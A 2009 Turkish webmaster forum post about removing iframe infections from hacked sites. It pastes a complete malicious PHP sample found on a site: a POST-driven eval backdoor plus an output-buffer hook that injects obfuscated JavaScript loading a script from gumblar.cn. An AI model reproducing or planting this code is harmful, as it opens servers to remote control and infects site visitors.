Tekil Mesaj gösterimi - Sitenize Bulaşan iframe virüsünün temizlenmesi için php script

Konu Sitenize Bulaşan iframe virüsünün temizlenmesi için php script

16-05-2009, 23:26:25

#25

Üyeliği durduruldu

sdemirkeser adlı üyeden alıntı: mesajı görüntüle

şahsen kendi yaşamış birisi olarak aynen katılıyorum.
1. seçenek konsoldan baglanin ssh ile. direk ssh dan temizlediginiz zaman sunucu kısmında rahat edersiniz.
kendi bilgisayarınıza gelince Kaspersky buluyor virüsü. en temizi zaten bi format (aslinda geri ubuntu kullanmaya dönmek gerek) ondan sorna ilk kurduğunuz şey virüs program + update edince zaten rahatlıyorsunuz
bir örnek olarak kuru kuru iframe de atmiyor amcalar da virüsü geliştiriyorlar.
temizlemeyi unuttuğum bir siteden şöyle bir kod çıktı

şahsen ohaaa oldum

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciB4VVE9JyUnO3ZhciB4MnpCSj0oJ3Zhci0yMGEtM2QtMjJTYy03Mi02OS03MHRFbi02N2luLTY1LTIyLTJjYi0zZC0yMlYtNjVyc2lvLTZlKCkrLTIyLTJjLTZhLTNkLTIyLTIyLTJjdS0zZG5hdi02OWdhLTc0LTZmci0yZS03NXNlci00MWctNjVudC0zYmlmKCh1LTJlaW4tNjRleE9mKC0yMldpLTZlLTIyKS0zZTApLTI2LTI2KHUtMmVpLTZlZGV4Ty02NigtMjItNGVULTIwNi0yMiktM2MwKS0yNi0yNihkb2N1LTZkZS02ZXQtMmVjb29raWUtMmVpbmRleC00ZmYtMjgtMjJtLTY5LTY1LTZiLTNkMS0yMiktM2MwKS0yNi0yNih0LTc5LTcwZS02ZmYoenJ2enQtNzMpLTIxLTNkdHlwLTY1LTZmZigtMjItNDEtMjIpKSktN2ItN2EtNzJ2LTdhdHMtM2QtMjJBLTIyLTNiZXZhbC0yOC0yMmlmKHctNjluZG8tNzctMmUtMjIrLTYxLTJiLTIyKWotM2RqLTJiLTIyK2ErLTIyTWFqby03Mi0yMistNjIrYS0yYi0yMk1pLTZlby03Mi0yMistNjIrYSstMjJCLTc1aWxkLTIyK2IrLTIyai0zYi0yMiktM2JkLTZmYy03NS02ZGVuLTc0LTJldy03MmktNzRlKC0yMi0zYy03M2MtNzItNjlwdC0yMHNyYy0zZC0yZi0yZmd1bWJsYXItMmVjbi0yZi03MnMtNzMtMmYtM2YtNjlkLTNkLTIyK2otMmItMjItM2UtM2MtNWMtMmZzYy03MmktNzB0LTNlLTIyLTI5LTNiLTdkJykucmVwbGFjZSgvLS9nLHhVUSk7ZXZhbCh1bmVzY2FwZSh4MnpCSikpfSkoKTsKIC0tPjwvc2NyaXB0Pg=='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><

şahsen yazanı hayvan zekasından dolayı taktir ettim

o kodun acilimini yapabilecek varmi ??? cok ilginc bir seye benziyor..